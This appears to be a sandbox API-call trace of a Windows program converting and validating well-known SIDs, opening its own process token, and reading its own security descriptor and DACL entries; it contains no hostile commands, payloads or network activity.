[0120.596] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.596] IsIconic (hWnd=0x7019e) returned 0
[0120.596] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.596] FlatSB_SetScrollProp (param_1=0x7019e, index=0x100, newValue=0x0, param_4=0) returned 0
[0120.596] GetSysColor (nIndex=20) returned 0xffffff
[0120.596] FlatSB_SetScrollProp (param_1=0x7019e, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0120.596] FlatSB_SetScrollInfo (param_1=0x7019e, code=1, psi=0x16edaa, fRedraw=1) returned 0
[0120.596] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.596] IsIconic (hWnd=0x7019e) returned 0
[0120.596] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.596] GetCurrentThreadId () returned 0xfd4
[0120.596] ConvertSidToStringSidA () returned 0x1
[0120.597] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.597] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0120.597] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.597] LocalFree (hMem=0x6c2f90) returned 0x0
[0120.597] ConvertStringSidToSidA () returned 0x1
[0120.597] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b12914, pSourceSid=0x6c2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b12914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.597] IsValidSid (pSid=0x2b12914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.597] ConvertSidToStringSidA () returned 0x1
[0120.597] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.597] LocalFree (hMem=0x6c2f90) returned 0x0
[0120.597] ConvertStringSidToSidA () returned 0x1
[0120.597] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1702c, pSourceSid=0x6c2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b1702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.597] IsValidSid (pSid=0x2b1702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.597] ConvertSidToStringSidA () returned 0x1
[0120.597] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.597] LocalFree (hMem=0x6c2f90) returned 0x0
[0120.597] ConvertStringSidToSidA () returned 0x1
[0120.597] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1f5a0, pSourceSid=0x6c2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b1f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.597] IsValidSid (pSid=0x2b1f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.597] ConvertSidToStringSidA () returned 0x1
[0120.597] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.597] LocalFree (hMem=0x6c2f90) returned 0x0
[0120.597] ConvertStringSidToSidA () returned 0x1
[0120.597] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1f614, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.598] IsValidSid (pSid=0x2b1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.598] ConvertSidToStringSidA () returned 0x1
[0120.598] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.598] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.598] ConvertStringSidToSidA () returned 0x1
[0120.598] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1f688, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2b1f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0120.598] IsValidSid (pSid=0x2b1f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0120.598] ConvertSidToStringSidA () returned 0x1
[0120.598] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.598] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.598] ConvertStringSidToSidA () returned 0x1
[0120.598] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1f6fc, pSourceSid=0x6d6f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2b1f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0120.598] IsValidSid (pSid=0x2b1f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0120.598] ConvertSidToStringSidA () returned 0x1
[0120.598] LocalFree (hMem=0x6cc1c8) returned 0x0
[0120.598] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.598] ConvertStringSidToSidA () returned 0x1
[0120.598] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1f770, pSourceSid=0x6d6f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2b1f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0120.598] IsValidSid (pSid=0x2b1f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0120.598] ConvertSidToStringSidA () returned 0x1
[0120.598] LocalFree (hMem=0x6cc1c8) returned 0x0
[0120.598] LocalFree (hMem=0x6d6f70) returned 0x0
[0120.598] ConvertStringSidToSidA () returned 0x1
[0120.598] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1f7f8, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2b1f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0120.598] IsValidSid (pSid=0x2b1f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0120.598] ConvertSidToStringSidA () returned 0x1
[0120.598] LocalFree (hMem=0x6cc1c8) returned 0x0
[0120.598] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.598] ConvertStringSidToSidA () returned 0x1
[0120.598] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1f880, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2b1f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0120.598] IsValidSid (pSid=0x2b1f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0120.598] ConvertSidToStringSidA () returned 0x1
[0120.598] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.598] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.598] ConvertStringSidToSidA () returned 0x1
[0120.599] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1f90c, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2b1f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0120.599] IsValidSid (pSid=0x2b1f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0120.599] ConvertSidToStringSidA () returned 0x1
[0120.599] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.599] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.599] ConvertStringSidToSidA () returned 0x1
[0120.599] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1f998, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2b1f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0120.599] IsValidSid (pSid=0x2b1f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0120.599] ConvertSidToStringSidA () returned 0x1
[0120.599] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.599] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.599] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.599] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0120.599] GetCurrentThread () returned 0xfffffffe
[0120.599] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.599] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0120.599] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x16e62c | out: TokenHandle=0x16e62c*=0x29f3756) returned 0
[0120.599] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.599] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0120.599] GetCurrentProcess () returned 0xffffffff
[0120.599] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.600] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0120.600] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2b1fa3c | out: TokenHandle=0x2b1fa3c*=0x1d0) returned 1
[0120.600] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.600] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0120.600] MapGenericMask (in: AccessMask=0x16e4a4, GenericMapping=0x16e4a8 | out: AccessMask=0x16e4a4)
[0120.600] MapGenericMask (in: AccessMask=0x16e5d8, GenericMapping=0x16e5dc | out: AccessMask=0x16e5d8)
[0120.600] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.600] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0120.600] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16e5ec | out: TokenInformation=0x0, ReturnLength=0x16e5ec) returned 0
[0120.600] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.600] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0120.600] GetLastError () returned 0x7a
[0120.601] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.601] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0120.601] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x6d0780, TokenInformationLength=0x24, ReturnLength=0x16e610 | out: TokenInformation=0x6d0780, ReturnLength=0x16e610) returned 1
[0120.601] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1fab0, pSourceSid=0x6d0788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2b1fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0120.601] IsValidSid (pSid=0x2b1fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0120.601] ConvertSidToStringSidA () returned 0x1
[0120.601] LocalFree (hMem=0x6c9e80) returned 0x0
[0120.601] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.601] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0120.601] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1fb34, pSourceSid=0x2b1fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2b1fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0120.601] IsValidSid (pSid=0x2b1fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0120.601] ConvertSidToStringSidA () returned 0x1
[0120.601] LocalFree (hMem=0x6c9e80) returned 0x0
[0120.601] IsValidSid (pSid=0x2b1fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0120.602] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.602] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0120.602] CloseHandle (hObject=0x1d0) returned 1
[0120.602] ConvertStringSidToSidA () returned 0x1
[0120.602] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1fa54, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2b1fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0120.602] IsValidSid (pSid=0x2b1fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0120.602] ConvertSidToStringSidA () returned 0x1
[0120.602] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.602] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.602] ConvertStringSidToSidA () returned 0x1
[0120.602] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1fae0, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2b1fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0120.602] IsValidSid (pSid=0x2b1fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0120.602] ConvertSidToStringSidA () returned 0x1
[0120.602] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.602] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.602] ConvertStringSidToSidA () returned 0x1
[0120.602] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1fbfc, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2b1fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0120.602] IsValidSid (pSid=0x2b1fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0120.602] ConvertSidToStringSidA () returned 0x1
[0120.602] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.602] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.602] ConvertStringSidToSidA () returned 0x1
[0120.602] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1fc8c, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2b1fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0120.602] IsValidSid (pSid=0x2b1fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0120.602] ConvertSidToStringSidA () returned 0x1
[0120.603] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.603] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.603] ConvertStringSidToSidA () returned 0x1
[0120.603] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1fd1c, pSourceSid=0x6d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2b1fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0120.603] IsValidSid (pSid=0x2b1fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0120.603] ConvertSidToStringSidA () returned 0x1
[0120.603] LocalFree (hMem=0x6d6f58) returned 0x0
[0120.603] LocalFree (hMem=0x6d6f40) returned 0x0
[0120.603] GetCurrentProcessId () returned 0xfd0
[0120.603] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0xfd0) returned 0x1d0
[0120.603] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.603] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0120.603] GetSecurityInfo () returned 0x0
[0120.606] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.606] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0120.606] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x6d0f28, pControl=0x16e3b2, lpdwRevision=0x16e3ac | out: pControl=0x16e3b2, lpdwRevision=0x16e3ac) returned 1
[0120.606] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.606] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0120.606] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x6d0f28, pOwner=0x16e3a8, lpbOwnerDefaulted=0x16e39c | out: pOwner=0x16e3a8*=0x0, lpbOwnerDefaulted=0x16e39c) returned 1
[0120.606] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.606] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0120.606] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x6d0f28, pGroup=0x16e3a8, lpbGroupDefaulted=0x16e39c | out: pGroup=0x16e3a8*=0x0, lpbGroupDefaulted=0x16e39c) returned 1
[0120.606] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.607] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0120.607] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x6d0f28, lpbDaclPresent=0x16e3a0, pDacl=0x16e394, lpbDaclDefaulted=0x16e39c | out: lpbDaclPresent=0x16e3a0, pDacl=0x16e394, lpbDaclDefaulted=0x16e39c) returned 1
[0120.607] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.607] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0120.607] IsValidAcl (pAcl=0x6d0f3c) returned 1
[0120.607] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.607] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0120.607] GetAce (in: pAcl=0x6d0f3c, dwAceIndex=0x0, pAce=0x16e234 | out: pAce=0x16e234*=0x6d0f44) returned 1
[0120.607] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1fe74, pSourceSid=0x6d0f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b1fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.607] IsValidSid (pSid=0x2b1fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.607] ConvertSidToStringSidA () returned 0x1
[0120.607] LocalFree (hMem=0x6d7018) returned 0x0
[0120.607] GetAce (in: pAcl=0x6d0f3c, dwAceIndex=0x1, pAce=0x16e234 | out: pAce=0x16e234*=0x6d0f5c) returned 1
[0120.607] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b1ff60, pSourceSid=0x6d0f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2b1ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.607] IsValidSid (pSid=0x2b1ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.607] ConvertSidToStringSidA () returned 0x1
[0120.607] LocalFree (hMem=0x6d7018) returned 0x0
[0120.608] GetAce (in: pAcl=0x6d0f3c, dwAceIndex=0x2, pAce=0x16e234 | out: pAce=0x16e234*=0x6d0f70) returned 1
[0120.608] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b129c0, pSourceSid=0x6d0f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2b129c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0120.608] IsValidSid (pSid=0x2b129c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0120.608] ConvertSidToStringSidA () returned 0x1
[0120.608] LocalFree (hMem=0x6d7018) returned 0x0
[0120.608] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.608] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
